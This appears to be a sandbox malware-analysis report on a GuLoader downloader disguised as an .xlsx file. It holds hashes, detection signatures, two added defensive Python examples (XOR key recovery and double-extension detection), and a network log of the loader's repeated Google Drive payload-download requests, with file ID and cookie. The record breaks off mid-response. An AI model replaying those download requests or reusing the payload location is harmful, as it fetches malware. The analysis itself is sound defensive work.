

Windows Analysis Report
09-FD-94.03.60.175.07.xlsx.exe

Overview

General Information

Sample name: 09-FD-94.03.60.175.07.xlsx.exe
Analysis ID: 1576274
MD5: 321a9608e5bf03bf63f4574d0df1a380
SHA1: 71c523fc14b83e0c8d5eac9bcc61c9487c1f2dfd
SHA256: c113d227b647a1a61b1f9f6c5350a25a43acc26960ef9d9b1a3c5e80e68d75f0
Tags: exe, user-Racco42

Detection

GuLoader
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is XORed.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
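The Malpedia description above says the payload GuLoader fetches is XORed. The following is an added example, not code from the report, from Malpedia or from GuLoader itself: it shows how a repeating XOR key can be recovered from the encrypted download alone by known-plaintext, because every MSVC-linked PE starts with the same DOS header and stub bytes. The encrypted payload and the 23-byte key are constructed for the example; the real key sits in the loader's shellcode and is not on this page. The maximum key length tried (60) is an assumption chosen to match the amount of known plaintext the DOS header supplies; longer keys need more predictable offsets added to the known-plaintext map.

```python
"""Recover a repeating XOR key from a GuLoader-style XORed PE payload.

Added example, not part of the Joe Sandbox report: known-plaintext key
recovery against the predictable DOS header/stub of a PE file, followed by
a validation step (PE signature at e_lfanew) so a wrong key length is rejected.
The payload and key below are constructed.
"""
import struct
from typing import Dict, Optional, Tuple

# Standard DOS stub emitted by the MSVC linker, located at offset 0x40.
DOS_STUB = (b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
            b"This program cannot be run in DOS mode.\r\r\n$")


def known_pe_prefix() -> Dict[int, int]:
    """Offsets whose plaintext is predictable in a typical PE.

    Bytes 0x00-0x3B of the DOS header are constant; 0x3C-0x3F (e_lfanew) vary
    from file to file and are left out; the DOS stub text follows at 0x40.
    """
    header = (b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
              b"\xb8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00" + b"\x00" * 32)
    known = {off: val for off, val in enumerate(header)}            # 0x00..0x3B
    known.update({0x40 + i: val for i, val in enumerate(DOS_STUB)})  # 0x40..0x78
    return known


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; encryption and decryption are the same operation."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(ciphertext: bytes, key_len: int, known: Dict[int, int]) -> Optional[bytes]:
    """Derive each key byte from one offset whose plaintext is known.

    Returns None when some key position has no known-plaintext offset in its
    residue class (key too long for the available known bytes).
    """
    key = bytearray(key_len)
    covered = [False] * key_len
    for off, plain in known.items():
        pos = off % key_len
        if off < len(ciphertext) and not covered[pos]:
            key[pos] = ciphertext[off] ^ plain
            covered[pos] = True
    return bytes(key) if all(covered) else None


def looks_like_pe(data: bytes) -> bool:
    """'MZ' at offset 0 and 'PE\\0\\0' at the offset e_lfanew points to."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def plausible_decryption(data: bytes, known: Dict[int, int]) -> bool:
    """The candidate plaintext must reproduce every predictable byte and be a PE."""
    return all(data[off] == val for off, val in known.items() if off < len(data)) and looks_like_pe(data)


def find_xor_key(ciphertext: bytes, max_key_len: int = 60) -> Optional[Tuple[int, bytes]]:
    """Try key lengths 1..max_key_len; return (length, key) for the first that yields a valid PE."""
    known = known_pe_prefix()
    for key_len in range(1, max_key_len + 1):
        key = recover_key(ciphertext, key_len, known)
        if key is not None and plausible_decryption(xor_bytes(ciphertext, key), known):
            return key_len, key
    return None


def build_fake_pe() -> bytes:
    """Constructed stand-in for a downloaded payload: real DOS header layout, dummy PE body."""
    blob = bytearray(0x80)
    for off, val in known_pe_prefix().items():
        blob[off] = val
    struct.pack_into("<I", blob, 0x3C, 0x80)            # e_lfanew: NT headers right after the stub
    blob += b"PE\x00\x00" + b"\x4c\x01"                  # signature + IMAGE_FILE_MACHINE_I386
    blob += bytes((i * 37 + 11) & 0xFF for i in range(600))  # filler in place of headers/sections
    return bytes(blob)


EXAMPLE_KEY = b"constructed-example-key"                # 23 bytes, constructed for this example
ENCRYPTED_PAYLOAD = xor_bytes(build_fake_pe(), EXAMPLE_KEY)

if __name__ == "__main__":
    found = find_xor_key(ENCRYPTED_PAYLOAD)
    if found:
        key_len, key = found
        print(f"recovered {key_len}-byte key: {key!r}")
        open("payload.decrypted.bin", "wb").write(xor_bytes(ENCRYPTED_PAYLOAD, key))
```

The validation step matters: with only the first 60 bytes known, every key length up to 60 produces some candidate key, so a wrong length is only rejected because the decrypted DOS stub and the PE signature at e_lfanew do not line up. If a real sample carries a Rich header the stub and e_lfanew shift, and the known-plaintext map must be adjusted accordingly.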
Source | Rule | Description | Author | Strings
00000002.00000002.2751336924.0000000004A43000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000000.00000002.1600421494.0000000007ED3000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

      System Summary

      Source: Process started | Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe", CommandLine: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe, NewProcessName: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe, OriginalFileName: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe", ProcessId: 3232, ProcessName: 09-FD-94.03.60.175.07.xlsx.exe
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-12-16T17:57:42.262363+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49709 | 172.217.19.174 | 443 | TCP
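The Sigma match above fired on the sample's name alone: a document extension followed by an executable one. As an added example (not from the report and not the Sigma rule's own logic), the check below re-implements that idea over process-creation events so it can be run against an EDR or Sysmon export. The event records are constructed; the first reuses the image path and PIDs recorded in the report.

```python
"""Flag double-extension lures in process-creation events.

Added example (not from the Joe Sandbox report and not the Sigma rule's
own logic): a minimal re-implementation of the idea behind the Sigma hit
"Suspicious Double Extension File Execution" recorded above. The events
below are constructed; the first one reuses the image path from the report.
"""
from __future__ import annotations

from pathlib import PureWindowsPath

# What a lure pretends to be ...
DECOY_EXTENSIONS = {
    "xlsx", "xls", "docx", "doc", "pptx", "ppt", "pdf", "rtf", "txt", "csv",
    "jpg", "jpeg", "png", "gif", "mp3", "mp4", "zip", "rar",
}
# ... and what Windows will actually execute when the user double-clicks.
EXECUTABLE_EXTENSIONS = {
    "exe", "scr", "pif", "com", "bat", "cmd", "vbs", "vbe", "js", "jse",
    "wsf", "wsh", "ps1", "hta", "msi", "lnk",
}


def has_suspicious_double_extension(image_path: str) -> bool:
    """True for names of the form <anything>.<decoy>.<executable>, e.g. invoice.xlsx.exe.

    Whitespace between the two extensions ("invoice.pdf   .exe", a common trick
    to push the real extension out of view) is stripped before matching.
    """
    parts = [p.strip() for p in PureWindowsPath(image_path).name.lower().split(".")]
    if len(parts) < 3:
        return False
    return parts[-1] in EXECUTABLE_EXTENSIONS and parts[-2] in DECOY_EXTENSIONS


def scan_process_events(events: list[dict]) -> list[dict]:
    """Return a compact alert record for every event whose image has a lure double extension."""
    alerts = []
    for event in events:
        image = event.get("Image") or event.get("NewProcessName") or ""
        if has_suspicious_double_extension(image):
            alerts.append({
                "ProcessId": event.get("ProcessId"),
                "Image": image,
                "ParentImage": event.get("ParentImage", ""),
            })
    return alerts


# Constructed process-creation events; the first mirrors the Sigma match in the report.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",
     "ProcessId": 3232, "ParentProcessId": 4084, "ParentImage": ""},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ProcessId": 900, "ParentImage": r"C:\Windows\System32\services.exe"},
    {"Image": r"C:\Users\user\Downloads\Invoice.pdf   .exe",
     "ProcessId": 4412, "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Users\user\Downloads\backup.tar.gz",          # two extensions, nothing executable
     "ProcessId": 4500, "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Users\user\Desktop\setup.exe",                # single extension
     "ProcessId": 4600, "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for alert in scan_process_events(SAMPLE_EVENTS):
        print(f"ALERT pid={alert['ProcessId']} image={alert['Image']}")
```

The two extension sets are deliberately explicit rather than "anything followed by .exe": a `backup.tar.gz` or `report.final.exe` should not page anyone, while a document or media extension directly in front of an executable one almost always is a lure.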


      AV Detection

      Source: 09-FD-94.03.60.175.07.xlsx.exe | ReversingLabs: Detection: 55%
      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
      Source: 09-FD-94.03.60.175.07.xlsx.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49709 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.8:49711 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49712 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.8:49721 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49725 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49727 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49758 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49771 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49783 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.8:49793 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49800 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.8:49806 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49812 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49856 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49869 version: TLS 1.2
      Source: 09-FD-94.03.60.175.07.xlsx.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_004057D0
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 0_2_0040628B FindFirstFileW,FindClose,0_2_0040628B
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 0_2_00402770 FindFirstFileW,0_2_00402770
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 2_2_00402770 FindFirstFileW,2_2_00402770
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 2_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,2_2_004057D0
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 2_2_0040628B FindFirstFileW,FindClose,2_2_0040628B
      Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49709 -> 172.217.19.174:443
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: drive.google.com | Cache-Control: no-cache
      Source: global traffic | HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: drive.google.com | Cache-Control: no-cache | Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global traffic | HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive | Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      (The cookie-bearing request pair above is logged 18 times in succession in this section, 36 entries in total, always in the order /uc then /download.)
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (2 entries)
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: drive.google.com | Cache-Control: no-cache
      Source: global traffic | HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: drive.google.com | Cache-Control: no-cache | Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global traffic | HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive | Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      (The cookie-bearing request pair above is logged 10 times in succession in this section, 20 entries in total, always in the order /uc then /download.)
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global traffic    DNS traffic detected: DNS query: drive.google.com
      Source: global traffic    DNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global traffic    HTTP traffic detected: 13 responses, every one of them HTTP/1.1 404 Not Found from Server: UploadServer with Content-Length: 1652, arriving roughly every five to six seconds between 16:57:44 and 16:58:56 GMT on 16 Dec 2024. The Google Drive file the loader requests was not available at analysis time, so the sandbox never obtained the second-stage payload; the detection on this page rests on the loader alone. The first response is shown in full; the remaining twelve are identical apart from the X-GUploader-UploadID, Date and CSP nonce values (listed below) and carry no P3P or Set-Cookie header.
          HTTP/1.1 404 Not Found
          X-GUploader-UploadID: AFiumC60LLM-YOjU2VrKMTjpmXbpPVmM74hqJjyQrxmJmjl24gxzL-xoK9fFdX9dHWiI3VV-
